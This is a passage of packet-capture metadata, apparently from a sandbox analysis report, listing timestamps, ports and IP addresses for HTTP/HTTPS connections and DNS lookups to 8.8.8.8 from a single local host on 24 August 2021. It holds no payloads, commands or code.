Aug 24, 2021 08:50:16.371134996 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.371146917 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.371167898 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.371181011 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.371192932 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.371213913 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.371225119 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.371242046 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.371262074 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.371287107 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.371294022 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.371306896 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.371316910 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.371328115 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.371346951 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.371371031 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.371388912 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.371391058 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.371409893 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.371419907 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.371429920 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.371449947 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.371453047 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.371470928 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.371491909 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.371509075 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.371515989 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.371536970 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.371547937 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.371563911 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.371584892 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.371593952 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.371611118 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.371630907 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.371644020 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.371655941 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.371675968 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.371702909 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.371702909 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.371721029 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.371726036 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.371747971 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.371767044 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.371774912 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.371793032 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.371824026 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.371849060 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.371862888 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.371870041 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.371891022 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.371908903 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.371927977 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.371932030 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.371934891 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.371954918 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.371970892 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.371979952 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.371999979 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.372026920 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.372045994 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.372055054 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.372071028 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.372092009 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.372103930 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.372107029 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.372117043 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.372138023 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.372164011 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.372184038 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.372191906 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.372195959 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.372240067 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.380657911 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.380698919 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.380727053 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.380747080 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.380769968 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.380810976 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.380822897 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.380845070 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.380868912 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.380904913 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.380974054 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.380992889 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.380994081 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.381014109 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.381032944 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.381057024 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.381078005 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.381087065 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.381097078 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.381117105 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.381135941 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.381145000 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.381155014 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.381174088 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.381175995 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.381197929 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.381206036 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.381217957 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.381237030 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.381262064 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.381292105 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.381308079 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.381328106 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.381347895 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.381375074 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.381386042 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.381400108 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.381407022 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.381426096 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.381469965 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.381609917 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.381629944 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.381648064 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.381666899 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.381685972 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.381711006 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.381736994 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.381751060 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.381762981 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.381766081 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.381819010 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.381822109 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.381839037 CEST	80	49766	188.119.112.104	192.168.2.5
Aug 24, 2021 08:50:16.381920099 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:50:16.413487911 CEST	49766	80	192.168.2.5	188.119.112.104
Aug 24, 2021 08:51:01.737715960 CEST	49717	80	192.168.2.5	172.67.216.236
Aug 24, 2021 08:51:01.754185915 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:51:01.754317999 CEST	49717	80	192.168.2.5	172.67.216.236
Aug 24, 2021 08:51:12.987385035 CEST	443	49727	195.201.225.248	192.168.2.5
Aug 24, 2021 08:51:12.987435102 CEST	443	49727	195.201.225.248	192.168.2.5
Aug 24, 2021 08:51:12.987538099 CEST	49727	443	192.168.2.5	195.201.225.248

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 24, 2021 08:48:05.380745888 CEST	61805	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:48:05.412905931 CEST	53	61805	8.8.8.8	192.168.2.5
Aug 24, 2021 08:48:19.458154917 CEST	54795	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:48:19.493643999 CEST	53	54795	8.8.8.8	192.168.2.5
Aug 24, 2021 08:48:36.881635904 CEST	49557	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:48:36.914031029 CEST	53	49557	8.8.8.8	192.168.2.5
Aug 24, 2021 08:48:59.400171041 CEST	61733	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:48:59.446058035 CEST	53	61733	8.8.8.8	192.168.2.5
Aug 24, 2021 08:48:59.469561100 CEST	65447	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:48:59.503024101 CEST	53	65447	8.8.8.8	192.168.2.5
Aug 24, 2021 08:49:00.027726889 CEST	52441	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:49:00.061115980 CEST	53	52441	8.8.8.8	192.168.2.5
Aug 24, 2021 08:49:11.417515039 CEST	62176	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:49:11.452486992 CEST	53	62176	8.8.8.8	192.168.2.5
Aug 24, 2021 08:49:11.828660011 CEST	59596	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:49:11.878504992 CEST	53	59596	8.8.8.8	192.168.2.5
Aug 24, 2021 08:49:15.868705034 CEST	65296	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:49:15.902678967 CEST	53	65296	8.8.8.8	192.168.2.5
Aug 24, 2021 08:49:20.758805990 CEST	63183	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:49:20.795989037 CEST	53	63183	8.8.8.8	192.168.2.5
Aug 24, 2021 08:49:20.866027117 CEST	60151	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:49:20.904937029 CEST	53	60151	8.8.8.8	192.168.2.5
Aug 24, 2021 08:49:36.022491932 CEST	56969	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:49:36.055778027 CEST	53	56969	8.8.8.8	192.168.2.5
Aug 24, 2021 08:49:38.528412104 CEST	55161	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:49:38.565742970 CEST	53	55161	8.8.8.8	192.168.2.5
Aug 24, 2021 08:49:38.602909088 CEST	54757	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:49:38.637031078 CEST	53	54757	8.8.8.8	192.168.2.5
Aug 24, 2021 08:49:49.979851007 CEST	55016	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:49:50.012147903 CEST	53	55016	8.8.8.8	192.168.2.5
Aug 24, 2021 08:49:50.840995073 CEST	64345	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:49:50.873158932 CEST	53	64345	8.8.8.8	192.168.2.5
Aug 24, 2021 08:49:57.010579109 CEST	57128	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:49:57.128109932 CEST	53	57128	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:07.599773884 CEST	54791	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:07.633028984 CEST	53	54791	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:09.092257977 CEST	50463	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:09.116544008 CEST	53	50463	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:09.124730110 CEST	50394	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:09.131568909 CEST	58530	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:09.158874035 CEST	53	58530	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:09.159703016 CEST	53	50394	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:09.166677952 CEST	53813	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:09.181174040 CEST	63732	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:09.192308903 CEST	53	53813	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:09.197670937 CEST	57344	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:09.232887030 CEST	53	57344	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:09.232940912 CEST	53	63732	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:09.234802008 CEST	54450	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:09.235984087 CEST	59261	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:09.236680031 CEST	57151	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:09.259018898 CEST	53	54450	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:09.288916111 CEST	53	59261	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:09.301541090 CEST	59413	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:09.336415052 CEST	53	59413	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:09.359869003 CEST	60516	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:09.392020941 CEST	53	60516	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:09.426819086 CEST	51649	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:09.459214926 CEST	53	51649	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:09.474839926 CEST	65086	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:09.506870985 CEST	53	65086	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:09.521406889 CEST	53	57151	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:09.557034969 CEST	56432	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:09.593472004 CEST	53	56432	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:09.722059011 CEST	52929	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:09.749398947 CEST	53	52929	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:10.055946112 CEST	64317	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:10.088681936 CEST	53	64317	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:10.603543043 CEST	61004	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:10.631715059 CEST	53	61004	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:10.676240921 CEST	56895	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:10.876173973 CEST	53	56895	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:10.884843111 CEST	62372	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:10.922385931 CEST	53	62372	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:11.226069927 CEST	61515	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:11.226584911 CEST	56675	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:11.252142906 CEST	53	61515	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:11.254251003 CEST	53	56675	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:11.265880108 CEST	57172	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:11.292457104 CEST	53	57172	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:11.874800920 CEST	55267	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:11.899051905 CEST	53	55267	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:12.017765999 CEST	50969	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:12.045166016 CEST	53	50969	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:12.168757915 CEST	64362	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:12.213113070 CEST	53	64362	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:12.242610931 CEST	54766	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:12.277523994 CEST	53	54766	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:12.636878967 CEST	61446	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:12.644144058 CEST	57515	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:12.662396908 CEST	53	61446	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:12.684761047 CEST	53	57515	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:12.707885981 CEST	58199	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:12.744210958 CEST	53	58199	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:12.980505943 CEST	65221	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:13.018223047 CEST	53	65221	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:13.035999060 CEST	61573	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:13.062243938 CEST	53	61573	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:13.225378036 CEST	56562	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:13.249691963 CEST	53	56562	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:13.462250948 CEST	53591	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:13.503674030 CEST	53	53591	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:13.557888031 CEST	59688	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:13.589893103 CEST	53	59688	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:13.687700033 CEST	56032	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:14.700190067 CEST	56032	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:14.916646004 CEST	61150	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:14.958040953 CEST	53	61150	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:14.986465931 CEST	53	56032	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:14.996932983 CEST	63458	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:15.002285957 CEST	50422	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:15.027899981 CEST	53	50422	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:15.030615091 CEST	53	63458	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:15.512718916 CEST	53247	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:15.537031889 CEST	53	53247	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:15.722174883 CEST	53	56032	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:15.824651957 CEST	58544	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:15.864989042 CEST	53	58544	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:16.162684917 CEST	53814	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:16.300987005 CEST	53	53814	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:16.347559929 CEST	51305	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:16.347811937 CEST	53670	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:16.375066042 CEST	53	51305	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:16.383277893 CEST	53	53670	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:16.420047045 CEST	55160	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:16.452661037 CEST	53	55160	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:16.978765011 CEST	61414	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:17.003007889 CEST	53	61414	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:17.028800964 CEST	63847	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:17.076554060 CEST	53	63847	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:17.577639103 CEST	61523	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:17.603843927 CEST	53	61523	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:17.613912106 CEST	50551	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:17.644925117 CEST	53	50551	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:17.694844961 CEST	62847	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:17.720113039 CEST	53	62847	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:17.905040026 CEST	57712	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:17.933028936 CEST	53	57712	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:18.065953970 CEST	61064	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:18.099034071 CEST	53	61064	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:18.123064995 CEST	61891	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:18.128104925 CEST	61585	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:18.155258894 CEST	53	61891	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:18.155287027 CEST	53	61585	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:18.745878935 CEST	65163	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:18.770225048 CEST	53	65163	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:19.190143108 CEST	58969	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:19.377523899 CEST	53	58969	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:19.390793085 CEST	53977	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:19.394310951 CEST	57147	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:19.423263073 CEST	53	57147	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:19.424192905 CEST	53	53977	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:20.124959946 CEST	52381	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:20.153403044 CEST	53	52381	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:20.831157923 CEST	49231	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:20.856036901 CEST	53	49231	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:21.502401114 CEST	53217	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:21.531152964 CEST	53	53217	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:21.614089012 CEST	52554	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:21.665292978 CEST	49603	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:21.691324949 CEST	53	49603	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:21.722748995 CEST	64476	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:21.757174015 CEST	53	64476	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:21.926542044 CEST	53	52554	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:23.041064978 CEST	52554	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:23.042356968 CEST	49975	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:23.059962988 CEST	57701	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:23.074708939 CEST	53	52554	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:23.078612089 CEST	53	49975	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:23.087110996 CEST	53	57701	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:23.154593945 CEST	60334	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:23.203983068 CEST	53	60334	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:23.289249897 CEST	64958	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:23.316478968 CEST	53	64958	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:23.333137035 CEST	58504	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:23.365545988 CEST	53	58504	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:23.533618927 CEST	64971	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:23.570904970 CEST	53	64971	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:23.735865116 CEST	58041	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:23.770473003 CEST	53	58041	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:23.813416958 CEST	57764	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:23.843375921 CEST	53	57764	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:23.959321022 CEST	57973	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:23.985497952 CEST	53	57973	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:24.377511978 CEST	63286	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:24.420622110 CEST	53	63286	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:24.465459108 CEST	52589	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:24.494592905 CEST	53	52589	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:24.502216101 CEST	54875	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:24.531133890 CEST	53	54875	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:24.560760975 CEST	49862	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:24.588202953 CEST	53	49862	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:24.631071091 CEST	50119	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:24.660121918 CEST	53	50119	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:24.900423050 CEST	60159	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:24.936043978 CEST	53	60159	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:25.050020933 CEST	49464	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:25.084907055 CEST	53	49464	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:25.133255959 CEST	64650	53	192.168.2.5	8.8.8.8
